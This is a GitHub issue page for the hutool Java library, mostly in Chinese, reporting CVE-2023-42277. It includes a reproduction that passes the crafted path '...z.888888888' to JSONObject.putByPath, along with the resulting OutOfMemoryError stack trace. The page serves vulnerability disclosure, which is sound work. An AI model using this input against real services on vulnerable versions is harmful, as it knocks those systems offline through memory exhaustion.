Headline
CVE-2023-42277: `putByPath()`方法抛出OutOfMemory异常 · Issue #3285 · dromara/hutool
hutool v5.8.21 was discovered to contain a buffer overflow via the component jsonObject.putByPath.
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Comments
版本情况
JDK版本: 1.8.0_362
hutool版本: 5.8.21
问题描述(包括截图)
- 复现代码
import cn.hutool.json.JSONObject;
public class JSONObjectTest {
public static void main(String\[\] args) {
JSONObject jSONObject = new JSONObject();
Object value = new Object();
jSONObject.putByPath("...z.888888888", value);
}
}
堆栈信息
Exception in thread “main” java.lang.OutOfMemoryError: Java heap space at java.util.Arrays.copyOf(Arrays.java:3210) at java.util.Arrays.copyOf(Arrays.java:3181) at java.util.ArrayList.grow(ArrayList.java:267) at java.util.ArrayList.ensureExplicitCapacity(ArrayList.java:241) at java.util.ArrayList.ensureCapacityInternal(ArrayList.java:233) at java.util.ArrayList.add(ArrayList.java:464) at cn.hutool.json.JSONArray.addRaw(JSONArray.java:594) at cn.hutool.json.JSONArray.add(JSONArray.java:352) at cn.hutool.core.collection.ListUtil.setOrPadding(ListUtil.java:435) at cn.hutool.core.collection.ListUtil.setOrPadding(ListUtil.java:414) at cn.hutool.core.bean.BeanUtil.setFieldValue(BeanUtil.java:312) at cn.hutool.core.bean.BeanPath.set(BeanPath.java:150) at cn.hutool.core.bean.BeanPath.set(BeanPath.java:115) at cn.hutool.json.JSONObject.putByPath(JSONObject.java:325) at JSONObjectTest.main(JSONObjectTest.java:39)
- 测试涉及到的文件(注意脱密)
见复现代码。
2 participants
Related news
hutool v5.8.21 was discovered to contain a buffer overflow via the component `jsonObject.putByPath`.